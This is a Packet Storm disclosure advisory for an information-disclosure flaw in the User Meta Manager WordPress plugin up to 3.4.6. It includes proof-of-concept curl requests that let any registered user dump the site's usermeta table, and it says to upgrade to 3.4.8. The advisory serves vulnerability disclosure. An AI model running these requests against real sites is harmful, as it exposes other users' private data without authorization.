WordPress User Meta Manager 3.4.6 Information Disclosure

2016-02-09T00:00:00
ID PACKETSTORM:135673
Type packetstorm
Reporter panVagenas
Modified 2016-02-09T00:00:00

Description

                                        
                                            `* Exploit Title: WordPress User Meta Manager Plugin [Information Disclosure]  
* Discovery Date: 2015-12-28  
* Public Disclosure Date: 2016-02-01  
* Exploit Author: Panagiotis Vagenas  
* Contact: https://twitter.com/panVagenas  
* Vendor Homepage: http://jasonlau.biz/home/  
* Software Link: https://wordpress.org/plugins/user-meta-manager/  
* Version: 3.4.6  
* Tested on: WordPress 4.4  
* Category: webapps  
  
## Description  
  
User Meta Manager for WordPress plugin up to v3.4.6 suffers from a  
information disclosure vulnerability. Any registered user can perform an  
a series of AJAX requests, in order to get all contents of `usermeta` DB  
table.  
  
`usermeta` table holds additional information for all registered users.  
User Meta Manager plugin offers a `usermeta` table backup functionality.  
During the backup process the plugin takes no action in protecting the  
leakage of the table contents to unauthorized (non-admin) users.  
  
## PoC  
  
### Get as MySQL query  
  
First a backup table must be created  
  
  
```sh  
curl -c ${USER_COOKIES} \  
"http://${VULN_SITE}/wp-admin/admin-ajax.php\  
?action=umm_switch_action&umm_sub_action=umm_backup"  
```  
  
  
Then we get the table with another request  
  
```sh  
curl -c ${USER_COOKIES} \  
"http://${VULN_SITE}/wp-admin/admin-ajax.php\  
?action=umm_switch_action&umm_sub_action=umm_backup&mode=sql"  
```  
  
### Get as CSV file  
  
```sh  
curl -c ${USER_COOKIES} \  
"http://${VULN_SITE}/wp-admin/admin-ajax.php\  
?action=umm_switch_action&umm_sub_action=umm_get_csv"  
```  
  
## Solution  
  
Upgrade to version 3.4.8  
  
--   
Panagiotis Vagenas  
Web Developer / Security Enthusiast  
6972883849 / 2105765611  
[Twitter](http://twitter.com/panVagenas)  
[LinkedIn](http://gr.linkedin.com/in/panvagenas)  
[GitHub](http://github.com/panvagenas)  
`